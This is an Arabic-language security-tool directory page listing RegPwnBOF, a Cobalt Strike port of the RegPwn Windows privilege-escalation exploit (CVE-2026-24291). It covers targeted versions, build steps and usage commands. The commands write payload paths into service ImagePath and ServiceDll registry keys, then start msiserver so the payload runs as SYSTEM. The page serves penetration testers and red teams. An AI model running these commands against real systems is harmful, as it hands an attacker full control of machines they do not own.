Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
RegPwnBOF — Bof of RegPwn by MDSec | Kitploit
أدوات/GitHubGitHub/flangvik/regpwnbof
تصعيد الامتيازاتالاستغلالما بعد الاستغلالاختبار الاختراقالفريق الأحمر
GitHubflangvik/regpwnbof

RegPwnBOF

Bof of RegPwn by MDSec

عرض المستودع
12710منذ 5 أشهرتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

RegPwn BOF

منفذ BOF من Cobalt Strike لاستغلال RegPwn بواسطة فيليب دراغوفيتش (@Wh04m1001) / MDSec ActiveBreach.

هذا إعادة تنفيذ غير محكمة (sloppy) للاستغلال الأصلي المكتوب بلغة C#. كل الفضل في البحث عن الثغرة والاستغلال يعود لفيليب دراغوفيتش و MDSec.

  • منشور المدونة: https://www.mdsec.co.uk/2026/03/rip-regpwn/
  • المستودع الأصلي: https://github.com/mdsecactivebreach/RegPwn
  • CVE: CVE-2026-24291

ما يفعله

يستغل حالة سباق (race condition) في رابط رمزي (symlink) في السجل (registry) ضمن آلية ATConfig الخاصة بإمكانية الوصول في Windows لكتابة قيم تعسفية إلى مفاتيح سجل محمية (HKLM) من سياق مستخدم عادي (تصعيد الامتيازات المحلية).

يستهدف Windows 11 25H2/24H2، وWindows 10 21H2، وWindows Server 2016/2019/2022 قبل تصحيح مارس 2026.

تحذير: هذا الاستغلال يقوم بقفل محطة العمل كجزء من حالة السباق.

الهدف الافتراضي

خدمة msiserver (مثبت Windows) ImagePath. تعمل هذه الخدمة كـ SYSTEM ويمكن للمستخدمين العاديين تشغيلها.

الاستخدام

Cobalt Strike

قم بتحميل regpwn.cna في مدير السكربتات، ثم:

root@kitploit:~
beacon> regpwn "cmd.exe /c C:\Programdata\payload.exe"
beacon> regpwn C:\payload.exe SYSTEM\CurrentControlSet\Services\msiserver ImagePath
beacon> regpwn C:\evil.dll SYSTEM\CurrentControlSet\Services\SomeService\Parameters ServiceDll

اختبار مستقل

root@kitploit:~
regpwn.x64.exe "cmd.exe /c C:\Programdata\payload.exe"
regpwn.x64.exe C:\payload.exe SYSTEM\CurrentControlSet\Services\OtherService ImagePath

بعد نجاح الاستغلال، ابدأ الخدمة لتنفيذ الحمولة كـ SYSTEM:

root@kitploit:~
net start msiserver

البناء

يتطلب x86_64-w64-mingw32-gcc (مترجم MinGW-w64 عبر المنصات).

root@kitploit:~
make        # بناء BOF (regpwn.x64.o)
make test   # بناء EXE مستقل (regpwn.x64.exe)
make clean

x64 فقط.

تنزيل الأداة